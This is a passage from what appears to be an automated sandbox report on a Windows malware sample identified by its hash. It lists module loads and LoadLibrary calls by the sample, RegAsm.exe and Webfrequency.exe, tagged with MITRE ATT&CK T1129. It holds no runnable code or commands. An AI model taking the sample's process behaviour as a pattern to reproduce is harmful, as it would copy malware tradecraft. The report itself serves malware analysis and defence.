\"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"RegAsm.exe\" loaded module \"KERNEL32\" at base 75eb0000\n \"RegAsm.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 69a20000\n \"RegAsm.exe\" loaded module \"USER32.DLL\" at base 76010000\n \"RegAsm.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"MSCOREE.DLL\" at base 6c6a0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"PSAPI.DLL\" at base 77700000\n \"RegAsm.exe\" loaded module \"RPCRT4.DLL\" at base 77bc0000\n \"RegAsm.exe\" loaded module \"KERNEL32.DLL\" at base 75eb0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 644a0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"OLE32.DLL\" at base 76220000\n \"RegAsm.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a70000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 746b0000\n \"RegAsm.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 73450000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6aa50000\n \"RegAsm.exe\" loaded module \"ADVAPI32.DLL\" at base 760e0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 73150000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 63a40000\n \"RegAsm.exe\" loaded module \"AMSI.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 63220000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MICROSOFT.V9921E851#\\A891970B44DB9E340C3EF3EFA95B793C\\MICROSOFT.VISUALBASIC.NI.DLL\" at base 6a790000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 6a5e0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 623b0000\n \"RegAsm.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77560000\n \"RegAsm.exe\" loaded module \"CRYPTSP.DLL\" at base 75580000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75310000\n \"RegAsm.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75b10000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.MANAGEMENT\\E114780FD3EA5727401C06EA4F22EF35\\SYSTEM.MANAGEMENT.NI.DLL\" at base 6a4b0000\n \"RegAsm.exe\" loaded module \"CLBCATQ.DLL\" at base 76190000\n \"RegAsm.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75eb0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WMIUTILS.DLL\" at base 6d490000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMPROX.DLL\" at base 6ea60000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\\\WMINET_UTILS.DLL\" at base 73120000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6f560000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6db20000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\OLEAUT32.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"OLEAUT32.DLL\" at base 77dc0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLEAUT32.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"SSPICLI.DLL\" at base 75a00000\n \"RegAsm.exe\" loaded module \"GDI32.DLL\" at base 75fc0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WS2_32.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"WS2_32.DLL\" at base 768c0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75540000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 750a0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 75530000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 6a3a0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 61c30000\n \"RegAsm.exe\" loaded module \"NTDLL.DLL\" at base 77c70000\n \"RegAsm.exe\" loaded module \"SHELL32.DLL\" at base 76910000\n \"RegAsm.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77560000\n \"RegAsm.exe\" loaded module \"PROFAPI.DLL\" at base 75b90000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"BCRYPT.DLL\" at base 75690000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 74200000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73e40000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73e20000\n \"RegAsm.exe\" loaded module \"DNSAPI.DLL\" at base 75400000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73e00000\n \"RegAsm.exe\" loaded module \"IPHLPAPI.DLL\" at base 72860000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 71ba0000\n \"RegAsm.exe\" loaded module \"RASADHLP.DLL\" at base 6d420000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\IPHLPAPI.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"DHCPCSVC6.DLL\" at base 71b80000\n \"RegAsm.exe\" loaded module \"DHCPCSVC.DLL\" at base 71b00000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMDISP.DLL\" at base 6d080000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ADVAPI32.DLL\" at base 760e0000\n \"RegAsm.exe\" loaded module \"SXS.DLL\" at base 75a80000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\CUSTOMMARSHALERS\\0DF8EC76525D72C37F86B6D2AB717E84\\CUSTOMMARSHALERS.NI.DLL\" at base 6ce00000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\CUSTOMMARSHALERS\\V4.0_4.0.0.0__B03F5F7F11D50A3A\\CUSTOMMARSHALERS.DLL\" at base 707d0000\n \"RegAsm.exe\" loaded module \"OLEAUT32\" at base 77dc0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DEVENUM.DLL\" at base 6f470000\n \"RegAsm.exe\" loaded module \"SETUPAPI.DLL\" at base 76720000\n \"RegAsm.exe\" loaded module \"NTMARTA.DLL\" at base 74fe0000\n \"RegAsm.exe\" loaded module \"WINTRUST.DLL\" at base 75cf0000\n \"RegAsm.exe\" loaded module \"MSDMO.DLL\" at base 73440000\n \"RegAsm.exe\" loaded module \"IMM32.DLL\" at base 76460000\n \"RegAsm.exe\" loaded module \"AVICAP32.DLL\" at base 6eb20000\n \"RegAsm.exe\" loaded module \"COMCTL32.DLL\" at base 727c0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"RegAsm.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\DIASYMREADER.DLL\" at base 69910000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 69a40000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 63090000\n \"Webfrequency.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 73d70000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6ac90000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 64e50000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 6aae0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 62220000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 64630000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 6a870000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 602c0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 73d30000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter amsi.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002568)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"LoadLibrary\" with a parameter 